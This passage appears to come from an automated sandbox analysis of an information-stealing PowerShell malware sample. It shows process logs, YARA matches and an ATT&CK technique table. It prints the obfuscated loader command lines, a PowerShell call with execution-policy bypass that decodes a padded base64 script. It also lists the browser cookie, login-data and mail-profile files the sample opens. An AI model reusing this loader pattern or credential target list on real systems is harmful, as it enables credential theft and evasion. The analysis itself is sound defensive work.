CAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vyc2lla2xoyw1lihnpzwtspsakzw5zawvrbhy6vvnfc2lla2xstkfnrxnpzwtsoyrxy2dzawvrbgttid0gc2lla2wiqzpcvxnpzwtsc2vyc1xzawvrbcr1c2vyc2lla2xoyw1lxhnpzwtszhdtlmjzawvrbgf0ijtpc2lla2xmichuzxnpzwtsc3qtugfzawvrbhroicrxc2lla2xjz2ttkxnpzwtsihsgicbzawvrbcbxcml0c2lla2xlluhvc3npzwtsdcaiqmfzawvrbhrjacbmc2lla2xpbgugznnpzwtsb3vuzdpzawvrbcakcwnnc2lla2xrbsiglxnpzwtsrm9yzwdzawvrbhjvdw5kc2lla2xdb2xvcnnpzwtsien5yw5zawvrbdsgicagc2lla2wkzmlszxnpzwtstgluzxnzawvrbca9ifttc2lla2x5c3rlbxnpzwtslklplkzzawvrbglszv06c2lla2w6umvhzhnpzwtsqwxstglzawvrbg5lcygkc2lla2xxy2drbxnpzwtslcbbu3lzawvrbhn0zw0uc2lla2xuzxh0lnnpzwtsrw5jb2rzawvrbgluz106c2lla2w6vvrgohnpzwtsktsgicbzawvrbcbmb3jlc2lla2xhy2ggkhnpzwtsjgxpbmvzawvrbcbpbiakc2lla2xmawxlthnpzwtsaw5lcylzawvrbcb7icagc2lla2wgicagihnpzwtsawygkcrzawvrbgxpbmugc2lla2wtbwf0y3npzwtsacanxjpzawvrbdo6id8oc2lla2wukykkj3npzwtsksb7icbzawvrbcagicagc2lla2wgicagihnpzwtsv3jpdgvzawvrbc1ib3n0c2lla2wgikluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xligrldhnpzwtszwn0zwrzawvrbcbpbib0c2lla2xozsbiyxnpzwtsdgnoigzzawvrbglszs4ic2lla2wgluzvcnnpzwtszwdyb3vzawvrbg5kq29sc2lla2xvcibdexnpzwtsyw47icbzawvrbcagicagc2lla2wgicagihnpzwtsdhj5ihtzawvrbcagicagc2lla2wgicagihnpzwtsicagicbzawvrbcakzgvjc2lla2xvzgvkqnnpzwtsexrlcybzawvrbd0gw1n5c2lla2xzdgvtlnnpzwtsq29udmvzawvrbhj0xto6c2lla2xgcm9tqnnpzwtsyxnlnjrzawvrbfn0cmluc2lla2xnkcrtyxnpzwtsdgnozxnzawvrbfsxxs5uc2lla2xyaw0okxnpzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagjglzawvrbg5qzwn0c2lla2xpb25db3npzwtszgugpsbzawvrbfttexn0c2lla2xlbs5uzxnpzwtsehqurw5zawvrbgnvzgluc2lla2xnxto6vxnpzwtsbmljb2rzawvrbguur2v0c2lla2xtdhjpbnnpzwtszygkzgvzawvrbgnvzgvkc2lla2xcexrlc3npzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagv3jzawvrbgl0zs1ic2lla2xvc3qginnpzwtssw5qzwnzawvrbhrpb24gc2lla2xjb2rlihnpzwtszgvjb2rzawvrbgvkihn1c2lla2xjy2vzc3npzwtsznvsbhlzawvrbc4iic1gc2lla2xvcmvncnnpzwtsb3vuzenzawvrbg9sb3igc2lla2xhcmvlbnnpzwtsoyagicbzawvrbcagicagc2lla2wgicagihnpzwtsicbxcmlzawvrbhrlluhvc2lla2xzdcairxnpzwtsegvjdxrzawvrbgluzybpc2lla2xuamvjdhnpzwtsaw9uignzawvrbg9kzs4uc2lla2wuiiatrnnpzwtsb3jlz3jzawvrbg91bmrdc2lla2xvbg9yihnpzwtswwvsbg9zawvrbhc7icagc2lla2wgicagihnpzwtsicagicbzawvrbcagieluc2lla2x2b2tllxnpzwtsrxhwcmvzawvrbhnzaw9uc2lla2wgjgluannpzwtszwn0aw9zawvrbg5db2rlc2lla2w7icagihnpzwtsicagicbzawvrbcagicagc2lla2wgigjyzxnpzwtsyws7icbzawvrbcagicagc2lla2wgicagihnpzwtsfsbjyxrzawvrbgnoihsgc2lla2wgicagihnpzwtsicagicbzawvrbcagicagc2lla2xxcml0zxnpzwtsluhvc3rzawvrbcairxjyc2lla2xvcibkdxnpzwtscmluzybzawvrbgrly29kc2lla2xpbmcgb3npzwtsciblegvzawvrbgn1dgluc2lla2xnigluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xloiakx3npzwtsiiatrm9zawvrbhjlz3jvc2lla2x1bmrdb3npzwtsbg9yifjzawvrbgvkoyagc2lla2wgicagihnpzwtsicagicbzawvrbh07icagc2lla2wgicagihnpzwtsftsgicbzawvrbcb9o30gc2lla2xlbhnlihnpzwtseyagicbzawvrbcagv3jpc2lla2x0zs1ib3npzwtsc3qgilnzawvrbhlzdgvtc2lla2wgrxjyb3npzwtscjogqm
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vyc2lla2xoyw1lihnpzwtspsakzw5zawvrbhy6vvnfc2lla2xstkfnrxnpzwtsoyrxy2dzawvrbgttid0gc2lla2wiqzpcvxnpzwtsc2vyc1xzawvrbcr1c2vyc2lla2xoyw1lxhnpzwtszhdtlmjzawvrbgf0ijtpc2lla2xmichuzxnpzwtsc3qtugfzawvrbhroicrxc2lla2xjz2ttkxnpzwtsihsgicbzawvrbcbxcml0c2lla2xlluhvc3npzwtsdcaiqmfzawvrbhrjacbmc2lla2xpbgugznnpzwtsb3vuzdpzawvrbcakcwnnc2lla2xrbsiglxnpzwtsrm9yzwdzawvrbhjvdw5kc2lla2xdb2xvcnnpzwtsien5yw5zawvrbdsgicagc2lla2wkzmlszxnpzwtstgluzxnzawvrbca9ifttc2lla2x5c3rlbxnpzwtslklplkzzawvrbglszv06c2lla2w6umvhzhnpzwtsqwxstglzawvrbg5lcygkc2lla2xxy2drbxnpzwtslcbbu3lzawvrbhn0zw0uc2lla2xuzxh0lnnpzwtsrw5jb2rzawvrbgluz106c2lla2w6vvrgohnpzwtsktsgicbzawvrbcbmb3jlc2lla2xhy2ggkhnpzwtsjgxpbmvzawvrbcbpbiakc2lla2xmawxlthnpzwtsaw5lcylzawvrbcb7icagc2lla2wgicagihnpzwtsawygkcrzawvrbgxpbmugc2lla2wtbwf0y3npzwtsacanxjpzawvrbdo6id8oc2lla2wukykkj3npzwtsksb7icbzawvrbcagicagc2lla2wgicagihnpzwtsv3jpdgvzawvrbc1ib3n0c2lla2wgikluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xligrldhnpzwtszwn0zwrzawvrbcbpbib0c2lla2xozsbiyxnpzwtsdgnoigzzawvrbglszs4ic2lla2wgluzvcnnpzwtszwdyb3vzawvrbg5kq29sc2lla2xvcibdexnpzwtsyw47icbzawvrbcagicagc2lla2wgicagihnpzwtsdhj5ihtzawvrbcagicagc2lla2wgicagihnpzwtsicagicbzawvrbcakzgvjc2lla2xvzgvkqnnpzwtsexrlcybzawvrbd0gw1n5c2lla2xzdgvtlnnpzwtsq29udmvzawvrbhj0xto6c2lla2xgcm9tqnnpzwtsyxnlnjrzawvrbfn0cmluc2lla2xnkcrtyxnpzwtsdgnozxnzawvrbfsxxs5uc2lla2xyaw0okxnpzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagjglzawvrbg5qzwn0c2lla2xpb25db3npzwtszgugpsbzawvrbfttexn0c2lla2xlbs5uzxnpzwtsehqurw5zawvrbgnvzgluc2lla2xnxto6vxnpzwtsbmljb2rzawvrbguur2v0c2lla2xtdhjpbnnpzwtszygkzgvzawvrbgnvzgvkc2lla2xcexrlc3npzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagv3jzawvrbgl0zs1ic2lla2xvc3qginnpzwtssw5qzwnzawvrbhrpb24gc2lla2xjb2rlihnpzwtszgvjb2rzawvrbgvkihn1c2lla2xjy2vzc3npzwtsznvsbhlzawvrbc4iic1gc2lla2xvcmvncnnpzwtsb3vuzenzawvrbg9sb3igc2lla2xhcmvlbnnpzwtsoyagicbzawvrbcagicagc2lla2wgicagihnpzwtsicbxcmlzawvrbhrlluhvc2lla2xzdcairxnpzwtsegvjdxrzawvrbgluzybpc2lla2xuamvjdhnpzwtsaw9uignzawvrbg9kzs4uc2lla2wuiiatrnnpzwtsb3jlz3jzawvrbg91bmrdc2lla2xvbg9yihnpzwtswwvsbg9zawvrbhc7icagc2lla2wgicagihnpzwtsicagicbzawvrbcagieluc2lla2x2b2tllxnpzwtsrxhwcmvzawvrbhnzaw9uc2lla2wgjgluannpzwtszwn0aw9zawvrbg5db2rlc2lla2w7icagihnpzwtsicagicbzawvrbcagicagc2lla2wgigjyzxnpzwtsyws7icbzawvrbcagicagc2lla2wgicagihnpzwtsfsbjyxrzawvrbgnoihsgc2lla2wgicagihnpzwtsicagicbzawvrbcagicagc2lla2xxcml0zxnpzwtsluhvc3rzawvrbcairxjyc2lla2xvcibkdxnpzwtscmluzybzawvrbgrly29kc2lla2xpbmcgb3npzwtsciblegvzawvrbgn1dgluc2lla2xnigluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xloiakx3npzwtsiiatrm9zawvrbhjlz3jvc2lla2x1bmrdb3npzwtsbg9yifjzawvrbgvkoyagc2lla2wgicagihnpzwtsicagicbzawvrbh07icagc2lla2wgicagihnpzwtsftsgicbzawvrbcb9o30gc2lla2xlbhnlihnpzwtseyagicbzawvrbcagv3jpc2lla2x0zs1ib3npzwtsc3qgilnzawvrbhlzdgvtc2lla2wgrxjyb3npzwtscjogqmJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 4.2.powershell.exe.5e62e10.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5eb2e30.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.82e0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.82e0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5e3adf0.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5e62e10.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5e3adf0.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000002.3788613694.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3788613694.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3794622597.00000000082E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Source: Yara matchFile source: amsi32_8644.amsi.csv, type: OTHER
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 4.2.powershell.exe.5e62e10.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5eb2e30.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.82e0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.82e0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5e3adf0.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5e62e10.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5e3adf0.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000002.3788613694.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3788613694.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3794622597.00000000082E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Source: Yara matchFile source: amsi32_8644.amsi.csv, type: OTHER
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            Valid Accounts121
                            Windows Management Instrumentation
                            1
                            Scripting
                            1
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            2
                            OS Credential Dumping
                            1
                            File and Directory Discovery
                            Remote Services11
                            Archive Collected Data
                            1
                            Ingress Tool Transfer
                            1
                            Exfiltration Over Alternative Protocol
                            Abuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API
                            1
                            DLL Side-Loading
                            11
                            Process Injection
                            1
                            Obfuscated Files or Information
                            LSASS Memory22
                            System Information Discovery
                            Remote Desktop Protocol2
                            Data from Local System
                            11
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter
                            Logon Script (Windows)Logon Script (Windows)2
                            Software Packing
                            Security Account Manager111
                            Security Software Discovery
                            SMB/Windows Admin Shares1
                            Email Collection
                            1
                            Non-Standard Port
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts21
                            PowerShell
                            Login HookLogin Hook1
                            DLL Side-Loading
                            NTDS1
                            Process Discovery
                            Distributed Component Object ModelInput Capture2
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Masquerading
                            LSA Secrets131
                            Virtualization/Sandbox Evasion
                            SSHKeylogging23
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
                            Virtualization/Sandbox Evasion
                            Cached Domain Credentials1
                            Application Window Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Process Injection
                            DCSync1
                            System Network Configuration Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.